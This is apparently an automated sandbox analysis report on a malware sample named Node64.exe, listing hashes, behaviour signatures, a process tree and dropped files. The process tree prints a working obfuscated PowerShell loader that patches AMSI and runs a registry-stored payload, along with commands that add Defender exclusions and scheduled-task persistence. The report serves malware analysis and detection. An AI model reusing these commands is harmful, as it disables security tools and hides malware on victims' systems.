Analysis

  • max time kernel
    150s
  • max time network
    156s
  • platform
    windows10-ltsc 2021_x64
  • resource
    win10ltsc2021-20241023-en
  • resource tags

    arch:x64arch:x86image:win10ltsc2021-20241023-enlocale:en-usos:windows10-ltsc 2021-x64system
  • submitted
    02/12/2024, 16:10

General

  • Target

    tmpfile-main/Node64.exe

  • Size

    368KB

  • MD5

    47fe2649cc2325a477fce08731aeb716

  • SHA1

    268abf2cceac62263fe040dc40b8b4b9aa3592da

  • SHA256

    d3808b41fe847339d9d69eaa05a5c7dea072b3e6325127a53b54c0d5e102f49b

  • SHA512

    173bd39f32dc4c95309e8e23a33542f92bb1c22459be30e47b52ab92827f418c7ba59fd9b31606f7f40824366e949e7de89a851d1acb8425bbf7fd607632e0d4

  • SSDEEP

    6144:dClTCNaC5liBrWdzoRQJx9LDmaAF5kDERQp+QDN9gkHp683KX:dUolitMIaAFkh6

Malware Config

Signatures

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 3 IoCs
  • Adds Run key to start application 2 TTPs 3 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 22 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:628
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:1040
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{f2983257-2dd5-4945-ba26-cc09f94ee010}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:324
      • C:\Windows\system32\lsass.exe
        C:\Windows\system32\lsass.exe
        1⤵
          PID:676
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
          1⤵
            PID:964
          • C:\Windows\System32\svchost.exe
            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
            1⤵
              PID:408
            • C:\Windows\System32\svchost.exe
              C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
              1⤵
                PID:400
              • C:\Windows\system32\svchost.exe
                C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                1⤵
                  PID:416
                • C:\Windows\System32\svchost.exe
                  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                  1⤵
                    PID:764
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
                    1⤵
                      PID:1072
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                      1⤵
                        PID:1176
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                        1⤵
                          PID:1248
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                          1⤵
                          • Drops file in System32 directory
                          PID:1264
                          • C:\Windows\system32\taskhostw.exe
                            taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                            2⤵
                              PID:3180
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE" "function Local:NmGdSppURqqL{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$MQoQQivOdnqpQn,[Parameter(Position=1)][Type]$brBwrasQPu)$tNVMvHtSxhf=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'e'+'f'+''+'l'+'e'+[Char](99)+''+'t'+''+[Char](101)+''+[Char](100)+''+[Char](68)+''+'e'+'le'+'g'+''+'a'+'t'+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+''+[Char](77)+''+'e'+''+[Char](109)+''+[Char](111)+''+[Char](114)+''+'y'+''+'M'+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+'l'+'e',$False).DefineType(''+[Char](77)+''+[Char](121)+''+[Char](68)+''+'e'+''+'l'+''+[Char](101)+''+[Char](103)+''+'a'+''+[Char](116)+'e'+[Char](84)+''+[Char](121)+'p'+'e'+'',''+[Char](67)+'l'+[Char](97)+''+'s'+''+[Char](115)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+'c,S'+[Char](101)+''+[Char](97)+''+[Char](108)+'ed'+','+''+[Char](65)+'n'+'s'+''+'i'+'C'+'l'+''+[Char](97)+''+'s'+''+'s'+','+[Char](65)+'u'+[Char](116)+''+[Char](111)+''+[Char](67)+''+'l'+''+[Char](97)+'s'+[Char](115)+'',[MulticastDelegate]);$tNVMvHtSxhf.DefineConstructor(''+[Char](82)+'T'+[Char](83)+''+'p'+''+'e'+''+[Char](99)+''+'i'+''+'a'+''+'l'+'N'+[Char](97)+''+[Char](109)+'e'+[Char](44)+'Hid'+'e'+'By'+'S'+''+[Char](105)+''+[Char](103)+''+','+''+[Char](80)+''+[Char](117)+''+[Char](98)+'l'+'i'+'c',[Reflection.CallingConventions]::Standard,$MQoQQivOdnqpQn).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+'t'+'ime,'+'M'+''+'a'+''+[Char](110)+'a'+[Char](103)+''+[Char](101)+'d');$tNVMvHtSxhf.DefineMethod(''+'I'+''+'n'+''+[Char](118)+''+[Char](111)+''+[Char](107)+''+[Char](101)+'',''+'P'+'u'+[Char](98)+''+'l'+''+[Char](105)+''+[Char](99)+''+','+''+'H'+'i'+[Char](100)+'e'+[Char](66)+''+[Char](121)+'S'+[Char](105)+''+'g'+''+[Char](44)+''+[Char](78)+'e'+[Char](119)+''+'S'+''+'l'+''+'o'+''+[Char](116)+''+','+'V'+[Char](105)+''+[Char](114)+''+[Char](116)+'u'+[Char](97)+''+[Char](108)+'',$brBwrasQPu,$MQoQQivOdnqpQn).SetImplementationFlags(''+[Char](82)+'u'+[Char](110)+''+[Char](116)+''+[Char](105)+'m'+'e'+',M'+'a'+'na'+'g'+'e'+[Char](100)+'');Write-Output $tNVMvHtSxhf.CreateType();}$SOWVGuXakUZFC=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+'y'+''+'s'+'t'+'e'+'m.'+[Char](100)+''+[Char](108)+'l')}).GetType('M'+'i'+''+'c'+''+[Char](114)+''+[Char](111)+''+[Char](115)+''+[Char](111)+''+'f'+''+'t'+''+'.'+'W'+'i'+''+'n'+''+[Char](51)+''+'2'+''+'.'+''+'U'+''+'n'+'s'+[Char](97)+''+[Char](102)+''+[Char](101)+''+[Char](78)+'a'+[Char](116)+''+[Char](105)+'ve'+[Char](77)+'e'+[Char](116)+'h'+'o'+''+[Char](100)+'s');$vXuVyjDcpUaZxj=$SOWVGuXakUZFC.GetMethod(''+[Char](71)+''+[Char](101)+''+'t'+''+[Char](80)+'r'+[Char](111)+'c'+[Char](65)+''+[Char](100)+''+[Char](100)+''+[Char](114)+'e'+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+'P'+''+'u'+'b'+[Char](108)+'i'+'c'+''+[Char](44)+'S'+[Char](116)+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$HGXpWVZeCoipORtRsmd=NmGdSppURqqL @([String])([IntPtr]);$ZDOxEshTmBMFRKRmZMmVew=NmGdSppURqqL @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$jGQpogqSIBl=$SOWVGuXakUZFC.GetMethod(''+[Char](71)+''+[Char](101)+''+'t'+''+'M'+'o'+'d'+'ul'+'e'+'Han'+'d'+''+'l'+''+[Char](101)+'').Invoke($Null,@([Object](''+'k'+'e'+'r'+''+[Char](110)+'el'+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](100)+''+[Char](108)+'l')));$zrftaLTEZxtDJV=$vXuVyjDcpUaZxj.Invoke($Null,@([Object]$jGQpogqSIBl,[Object](''+[Char](76)+''+'o'+'a'+'d'+''+[Char](76)+'ib'+'r'+'a'+[Char](114)+''+'y'+''+[Char](65)+'')));$JHlGsvfaGyzWHbMmv=$vXuVyjDcpUaZxj.Invoke($Null,@([Object]$jGQpogqSIBl,[Object]('Vir'+[Char](116)+'ua'+'l'+''+[Char](80)+'r'+[Char](111)+''+'t'+''+[Char](101)+''+[Char](99)+''+[Char](116)+'')));$WUegRNP=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($zrftaLTEZxtDJV,$HGXpWVZeCoipORtRsmd).Invoke(''+[Char](97)+''+'m'+''+'s'+'i'+'.'+''+[Char](100)+''+'l'+''+[Char](108)+'');$kykrGHgouzOPlRUcE=$vXuVyjDcpUaZxj.Invoke($Null,@([Object]$WUegRNP,[Object](''+'A'+''+[Char](109)+''+'s'+''+[Char](105)+'S'+[Char](99)+''+'a'+''+[Char](110)+''+[Char](66)+''+'u'+''+[Char](102)+''+'f'+''+[Char](101)+'r')));$PYOkbsexQE=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($JHlGsvfaGyzWHbMmv,$ZDOxEshTmBMFRKRmZMmVew).Invoke($kykrGHgouzOPlRUcE,[uint32]8,4,[ref]$PYOkbsexQE);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$kykrGHgouzOPlRUcE,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($JHlGsvfaGyzWHbMmv,$ZDOxEshTmBMFRKRmZMmVew).Invoke($kykrGHgouzOPlRUcE,[uint32]8,0x20,[ref]$PYOkbsexQE);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+'O'+'F'+[Char](84)+'W'+[Char](65)+''+[Char](82)+''+[Char](69)+'').GetValue('$'+[Char](78)+'od'+[Char](101)+'s'+[Char](116)+'a'+[Char](103)+''+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"
                              2⤵
                              • Suspicious use of NtCreateUserProcessOtherParentProcess
                              • Command and Scripting Interpreter: PowerShell
                              • Drops file in System32 directory
                              • Suspicious use of SetThreadContext
                              • Modifies data under HKEY_USERS
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              • Suspicious use of WriteProcessMemory
                              PID:1300
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                            1⤵
                              PID:1444
                            • C:\Windows\System32\svchost.exe
                              C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                              1⤵
                                PID:1460
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                1⤵
                                  PID:1476
                                • C:\Windows\system32\svchost.exe
                                  C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                                  1⤵
                                    PID:1516
                                  • C:\Windows\System32\svchost.exe
                                    C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                    1⤵
                                      PID:1540
                                    • C:\Windows\system32\svchost.exe
                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                      1⤵
                                        PID:1644
                                      • C:\Windows\system32\svchost.exe
                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                        1⤵
                                          PID:1680
                                          • C:\Windows\system32\sihost.exe
                                            sihost.exe
                                            2⤵
                                              PID:2784
                                          • C:\Windows\System32\svchost.exe
                                            C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                            1⤵
                                              PID:1736
                                            • C:\Windows\System32\svchost.exe
                                              C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                              1⤵
                                                PID:1768
                                              • C:\Windows\System32\svchost.exe
                                                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                1⤵
                                                  PID:1848
                                                • C:\Windows\system32\svchost.exe
                                                  C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                                  1⤵
                                                    PID:1912
                                                  • C:\Windows\System32\svchost.exe
                                                    C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                    1⤵
                                                      PID:1924
                                                    • C:\Windows\system32\svchost.exe
                                                      C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                      1⤵
                                                        PID:1940
                                                      • C:\Windows\system32\svchost.exe
                                                        C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                        1⤵
                                                          PID:2012
                                                        • C:\Windows\System32\svchost.exe
                                                          C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                          1⤵
                                                            PID:1700
                                                          • C:\Windows\System32\spoolsv.exe
                                                            C:\Windows\System32\spoolsv.exe
                                                            1⤵
                                                              PID:2140
                                                            • C:\Windows\System32\svchost.exe
                                                              C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                              1⤵
                                                                PID:2248
                                                              • C:\Windows\system32\svchost.exe
                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                                1⤵
                                                                  PID:2348
                                                                • C:\Windows\System32\svchost.exe
                                                                  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                                  1⤵
                                                                    PID:2404
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                                    1⤵
                                                                      PID:2456
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                                      1⤵
                                                                        PID:2468
                                                                      • C:\Windows\system32\svchost.exe
                                                                        C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                        1⤵
                                                                        • Drops file in System32 directory
                                                                        • Modifies data under HKEY_USERS
                                                                        PID:2560
                                                                      • C:\Windows\system32\svchost.exe
                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                        1⤵
                                                                          PID:2648
                                                                        • C:\Windows\sysmon.exe
                                                                          C:\Windows\sysmon.exe
                                                                          1⤵
                                                                            PID:2672
                                                                          • C:\Windows\System32\svchost.exe
                                                                            C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                            1⤵
                                                                              PID:2688
                                                                            • C:\Windows\system32\svchost.exe
                                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                              1⤵
                                                                                PID:2700
                                                                              • C:\Windows\system32\wbem\unsecapp.exe
                                                                                C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                                1⤵
                                                                                  PID:3064
                                                                                • C:\Windows\system32\svchost.exe
                                                                                  C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                                  1⤵
                                                                                    PID:2008
                                                                                  • C:\Windows\system32\svchost.exe
                                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                                    1⤵
                                                                                      PID:3324
                                                                                    • C:\Windows\system32\svchost.exe
                                                                                      C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                      1⤵
                                                                                        PID:3536
                                                                                      • C:\Windows\Explorer.EXE
                                                                                        C:\Windows\Explorer.EXE
                                                                                        1⤵
                                                                                          PID:3628
                                                                                          • C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Node64.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Node64.exe"
                                                                                            2⤵
                                                                                            • Checks computer location settings
                                                                                            • Adds Run key to start application
                                                                                            • Drops file in System32 directory
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            • Suspicious use of WriteProcessMemory
                                                                                            PID:2568
                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\$Node32.exe'
                                                                                              3⤵
                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                              PID:2064
                                                                                            • C:\Windows\System32\schtasks.exe
                                                                                              "C:\Windows\System32\schtasks.exe" /Create /F /TN "$Node32" /SC ONLOGON /TR "C:\Windows\System32\$Node32.exe" /RL HIGHEST
                                                                                              3⤵
                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                              PID:1380
                                                                                            • C:\Windows\System32\$Node32.exe
                                                                                              "C:\Windows\System32\$Node32.exe"
                                                                                              3⤵
                                                                                              • Executes dropped EXE
                                                                                              • System Location Discovery: System Language Discovery
                                                                                              PID:4880
                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\$Node2Json.exe'
                                                                                              3⤵
                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                              PID:3964
                                                                                            • C:\Windows\System32\schtasks.exe
                                                                                              "C:\Windows\System32\schtasks.exe" /Create /F /TN "$Node2Json" /SC ONLOGON /TR "C:\Windows\System32\$Node2Json.exe" /RL HIGHEST
                                                                                              3⤵
                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                              PID:1840
                                                                                            • C:\Windows\System32\$Node2Json.exe
                                                                                              "C:\Windows\System32\$Node2Json.exe"
                                                                                              3⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:3788
                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\$Node3Json.exe'
                                                                                              3⤵
                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                              PID:3464
                                                                                            • C:\Windows\System32\schtasks.exe
                                                                                              "C:\Windows\System32\schtasks.exe" /Create /F /TN "$Node3Json" /SC ONLOGON /TR "C:\Windows\System32\$Node3Json.exe" /RL HIGHEST
                                                                                              3⤵
                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                              PID:2288
                                                                                            • C:\Windows\System32\$Node3Json.exe
                                                                                              "C:\Windows\System32\$Node3Json.exe"
                                                                                              3⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:3280
                                                                                        • C:\Windows\system32\svchost.exe
                                                                                          C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                          1⤵
                                                                                            PID:3748
                                                                                          • C:\Windows\System32\RuntimeBroker.exe
                                                                                            C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                            1⤵
                                                                                              PID:4036
                                                                                            • C:\Windows\System32\RuntimeBroker.exe
                                                                                              C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                              1⤵
                                                                                                PID:4104
                                                                                              • C:\Windows\system32\DllHost.exe
                                                                                                C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                1⤵
                                                                                                  PID:4344
                                                                                                • C:\Windows\System32\svchost.exe
                                                                                                  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                                  1⤵
                                                                                                    PID:3620
                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                    C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                                    1⤵
                                                                                                    • Modifies data under HKEY_USERS
                                                                                                    PID:3460
                                                                                                  • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                    "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                    1⤵
                                                                                                    • Drops file in System32 directory
                                                                                                    • Modifies data under HKEY_USERS
                                                                                                    PID:4992
                                                                                                  • C:\Windows\system32\SppExtComObj.exe
                                                                                                    C:\Windows\system32\SppExtComObj.exe -Embedding
                                                                                                    1⤵
                                                                                                      PID:1892
                                                                                                    • C:\Windows\System32\svchost.exe
                                                                                                      C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                                      1⤵
                                                                                                        PID:2592
                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                        1⤵
                                                                                                        • Modifies data under HKEY_USERS
                                                                                                        PID:3140
                                                                                                      • C:\Windows\system32\DllHost.exe
                                                                                                        C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                        1⤵
                                                                                                          PID:3924
                                                                                                        • C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe
                                                                                                          "C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca
                                                                                                          1⤵
                                                                                                            PID:4284
                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                            C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
                                                                                                            1⤵
                                                                                                              PID:4748
                                                                                                            • C:\Windows\System32\WaaSMedicAgent.exe
                                                                                                              C:\Windows\System32\WaaSMedicAgent.exe 3874f99676d2a171db1648b456c00305 AF6bVzg0Nk+Uob03FtQ14g.0.1.0.0.0
                                                                                                              1⤵
                                                                                                                PID:1456
                                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  2⤵
                                                                                                                    PID:388
                                                                                                                • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                                  C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                  1⤵
                                                                                                                  • Checks BIOS information in registry
                                                                                                                  • Enumerates system info in registry
                                                                                                                  PID:4636
                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
                                                                                                                  1⤵
                                                                                                                    PID:2724
                                                                                                                  • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                                    C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                    1⤵
                                                                                                                      PID:4604
                                                                                                                    • C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                      C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                      1⤵
                                                                                                                        PID:1560
                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
                                                                                                                        1⤵
                                                                                                                          PID:1192
                                                                                                                        • C:\Windows\System32\mousocoreworker.exe
                                                                                                                          C:\Windows\System32\mousocoreworker.exe -Embedding
                                                                                                                          1⤵
                                                                                                                          • Checks processor information in registry
                                                                                                                          • Enumerates system info in registry
                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                          PID:4296

                                                                                                                        Network

                                                                                                                        MITRE ATT&CK Enterprise v15

                                                                                                                        Replay Monitor

                                                                                                                        Loading Replay Monitor...

                                                                                                                        Downloads

                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                                                                          Filesize

                                                                                                                          3KB

                                                                                                                          MD5

                                                                                                                          3eb3833f769dd890afc295b977eab4b4

                                                                                                                          SHA1

                                                                                                                          e857649b037939602c72ad003e5d3698695f436f

                                                                                                                          SHA256

                                                                                                                          c485a6e2fd17c342fca60060f47d6a5655a65a412e35e001bb5bf88d96e6e485

                                                                                                                          SHA512

                                                                                                                          c24bbc8f278478d43756807b8c584d4e3fb2289db468bc92986a489f74a8da386a667a758360a397e77e018e363be8912ac260072fa3e31117ad0599ac749e72

                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                          Filesize

                                                                                                                          1KB

                                                                                                                          MD5

                                                                                                                          b5bf6b0261deb53c0e3d422e3f83a664

                                                                                                                          SHA1

                                                                                                                          60cd83ab6dd15abaa9abf34d9ab54e42c8eefa16

                                                                                                                          SHA256

                                                                                                                          a431a9e84c64c6ad29339df6a714cb697081dc1c6c5557ada967d4caaeed0c1c

                                                                                                                          SHA512

                                                                                                                          27dfba0d2d7ebce4e6eebdeefa81b2518c5222efb9d37b4c323023e5117eed30ad6aeba8e062bde96d17d53b01bb9a59313229aeaf4863c8b30d9bbb09d46bff

                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                          Filesize

                                                                                                                          1KB

                                                                                                                          MD5

                                                                                                                          380667346230f568b33ee306d145cd0c

                                                                                                                          SHA1

                                                                                                                          761128658280c2f8070f879fe0173759e2147421

                                                                                                                          SHA256

                                                                                                                          34fd03e6c7b265c580eff0085960004daaa90c16473cbc236c263a453767c4c8

                                                                                                                          SHA512

                                                                                                                          32b89cffccf694b51872b9088759e3c6cd1e2c3fcbd0219b24fd1f7f191422fecaad6f77c9d57330281826c3609587cba942994de077662d9d1606a57f64a55b

                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_m3m1p1a5.dma.ps1

                                                                                                                          Filesize

                                                                                                                          60B

                                                                                                                          MD5

                                                                                                                          d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                          SHA1

                                                                                                                          6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                          SHA256

                                                                                                                          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                          SHA512

                                                                                                                          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                        • C:\Windows\System32\$Node2Json.exe

                                                                                                                          Filesize

                                                                                                                          116KB

                                                                                                                          MD5

                                                                                                                          41814c2aa6f0aaffaaaa26ffd07b3550

                                                                                                                          SHA1

                                                                                                                          ea9731c42a382ed003b5b4bfd28c3ba437c8d14a

                                                                                                                          SHA256

                                                                                                                          da2926ac30bda874255c093b58a8a4efa4b8e7872393ea4a242f17a4e3ab014e

                                                                                                                          SHA512

                                                                                                                          f2513d8e10536bd747dd1ec4a6aa9ec0007ea9a4484c364b2cf9d5ffd42cf3bcd0e346040d4c34c3dba28a208752b82c41bdae2a9dd88ebc1ba869cd1907877d

                                                                                                                        • C:\Windows\System32\$Node32.exe

                                                                                                                          Filesize

                                                                                                                          163KB

                                                                                                                          MD5

                                                                                                                          b850f016450d68da0ae4bb945355f70c

                                                                                                                          SHA1

                                                                                                                          521726c38af715e6ee1c76315151f0ed9518c6f4

                                                                                                                          SHA256

                                                                                                                          8a649909d1defa1b8966cde6ad854f3cbf7662a732cf1a16b853c793cf240d24

                                                                                                                          SHA512

                                                                                                                          30f152e08ba44308da9b9c42951e45a9b6c2ad808c3a426da4af0384939816e04f1faf38de1d3c404e515d90b2e2eaeabe152b0151fb3f21c6a00bd2fdac3b6c

                                                                                                                        • C:\Windows\System32\$Node3Json.exe

                                                                                                                          Filesize

                                                                                                                          117KB

                                                                                                                          MD5

                                                                                                                          391d4f99d0076ce566b370f1572ef670

                                                                                                                          SHA1

                                                                                                                          0bf04beb77440315098bacf30563a6542e254a45

                                                                                                                          SHA256

                                                                                                                          b55dbc5b3437654eca9fd1ea4826f81bde74af9e0c69109c25188461eb6a3605

                                                                                                                          SHA512

                                                                                                                          1952fa90fc139863381c15f424a8146335cbbc6f443efcdffc502f1064889a244fa7da1b30ebd4c9b2bec15fd55d367a2aa80afd576b1e2c4baed40ffec76497

